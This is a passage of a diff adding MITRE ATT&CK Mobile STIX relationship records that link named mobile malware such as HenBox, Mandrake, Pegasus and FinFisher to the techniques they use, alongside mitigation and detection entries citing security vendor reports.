+ } + ], + "modified": "2020-12-17T20:15:22.397Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can steal data from various sources, including chat, communication, and social media apps.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0fd34764-8a5d-43da-9bdf-5a0b7e436936", + "created": "2019-08-29T18:57:55.926Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Samsung Keyboards", + "url": "https://support.samsungknox.com/hc/en-us/articles/360001485027-3rd-party-keyboards-must-be-whitelisted-", + "description": "Samsung. (2019, August 16). 3rd party keyboards must be whitelisted.. Retrieved September 1, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "When using Samsung Knox, third-party keyboards must be explicitly added to an allow list in order to be available to the end-user.(Citation: Samsung Keyboards) An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features. 
", + "modified": "2022-04-05T19:41:57.905Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a9e97a14-ea3c-47b1-a865-0a1edea9c81c", + "type": "relationship", + "created": "2021-02-17T20:43:52.410Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." 
+ } + ], + "modified": "2021-02-17T20:43:52.410Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has searched for pdf, doc, docx, ppt, pptx, xls, and xlsx file types for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--baa82c0a-b51c-4d4a-ae1d-6d6fd637f78d", + "type": "relationship", + "created": "2020-07-15T20:20:59.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.294Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can obtain a list of installed applications.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d72c60b-d5d1-4b50-a01f-3882ddb335d9", + "created": "2019-09-04T14:28:15.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:48.912Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can remount the system partition as read/write to install attacker-specified certificates.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79ef0025-3e1c-4914-9873-19808c2a5bec", + "created": "2023-02-28T21:44:22.373Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, 
Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:44:22.373Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record the screen and stream the data off the device.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6935752c-e400-4dfa-863f-1d44a8f6dd50", + "type": "relationship", + "created": "2021-09-20T13:50:02.036Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2021-09-20T13:50:02.036Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can make phone calls.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--41da5845-a1a8-4d10-8929-053be3496396", + "created": "2022-04-20T17:46:43.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. 
Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:57.165Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) uses HTTP data exfiltration.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--81fb62ac-ba04-48d2-8817-52d0652f61a0", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. 
Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Judy](https://attack.mitre.org/software/S0325) bypasses Google Play's protections by downloading a malicious payload at runtime after installation.(Citation: CheckPoint-Judy)", + "relationship_type": "uses", + "source_ref": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8c8ce536-d9b5-4dfc-93f1-84c4f222b49e", + "type": "relationship", + "created": "2021-01-05T20:16:20.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.512Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can check the device’s battery status.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5151b976-cfcf-4771-a75a-995d49bcc1ab", + "created": "2022-04-11T20:06:38.811Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products that are part of the Samsung Knox for Mobile Threat Defense program could examine running applications while the device is idle, potentially detecting malicious applications that are running primarily when the device is not being used.", + "modified": "2022-04-11T20:06:38.811Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc79a212-139f-4dce-be72-e90585f38f03", + "created": "2023-03-16T18:31:37.091Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:31:37.091Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + 
"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a290a8ca-e650-456c-b33e-03343fe5ea4e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) accesses sensitive data in files, such as saving Skype calls by reading them out of the Skype database files.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fd05d96-552d-4ef9-98e3-ea70dc84f6a9", + "created": "2022-03-30T14:26:02.359Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 8 introduced additional limitations on the implicit intents that an application can register for.(Citation: Android Changes to System Broadcasts) ", + "modified": "2022-03-30T14:26:02.359Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a285f343-09c3-49af-9c18-1dccf89e9009", + "type": "relationship", + "created": "2020-11-20T16:37:28.391Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T16:37:28.391Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect a directory listing of external storage.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b8d027d-5da2-4a01-ad31-b6644a5cda61", + "type": "relationship", + "created": "2020-04-24T15:06:33.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T15:06:33.495Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can track the device’s location.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b5f3b110-fc66-4369-89f3-621c945d655f", + "type": "relationship", + "created": "2020-04-27T16:52:49.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.444Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) encrypts data prior to exfiltration.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d6bba99-ea81-42bc-b02a-e5e98b34a688", + "created": "2020-05-07T15:33:32.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. 
Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:19:44.427Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) can hide its icon from the application launcher.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8f2ff9c5-249d-4a9a-bdc6-0cef887eaefc", + "type": "relationship", + "created": "2020-07-15T20:20:59.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.298Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) obfuscates its hardcoded C2 URLs.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--75400f2e-8a9a-4bc6-a40b-f860b38868b6", + "created": "2023-03-16T13:31:29.822Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:31:29.822Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ab67b233-2c3d-4ac2-a3f0-13b6484ea920", + "created": "2022-04-05T19:46:22.326Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as keyboard registration or accessibility service access.", + "modified": "2022-04-05T19:46:22.326Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6f63395f-a826-45e2-8d3b-dccd6375f54d", + "created": "2019-07-10T15:25:57.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:29.860Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) accesses and exfiltrates the call log.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--96ec33c8-78b6-421f-bab3-bd9d0564db31", + "created": "2022-09-29T20:11:55.474Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. 
Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:39:16.003Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors capable of enumerating specific files on the infected devices.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--300c824d-5586-411b-b274-8941a99a98fb", + "created": "2022-03-30T14:06:01.859Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T14:06:01.859Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09c6bbd4-9058-4657-9d8e-656439637ac6", + "created": "2023-03-16T18:32:47.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 
"2023-03-16T18:32:47.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--35c67a18-7e8d-4bd5-9fe1-35b1ac3f401f", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RedDrop](https://attack.mitre.org/software/S0326) tricks the user into sending SMS messages to premium services and then deletes those messages.(Citation: Wandera-RedDrop)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c89d6493-3f33-4568-ac77-ba13b206ae69", + "created": "2023-03-20T18:52:24.667Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:24.667Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--492d5699-f885-411a-8431-254fcf33fb12", + "created": "2019-08-09T16:14:58.367Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Capture Sensor 2019", + "url": "https://developer.android.com/about/versions/pie/android-9.0-changes-all#bg-sensor-access", + "description": "Android Developers. (, January). Android 9+ Privacy Changes . Retrieved August 27, 2019." 
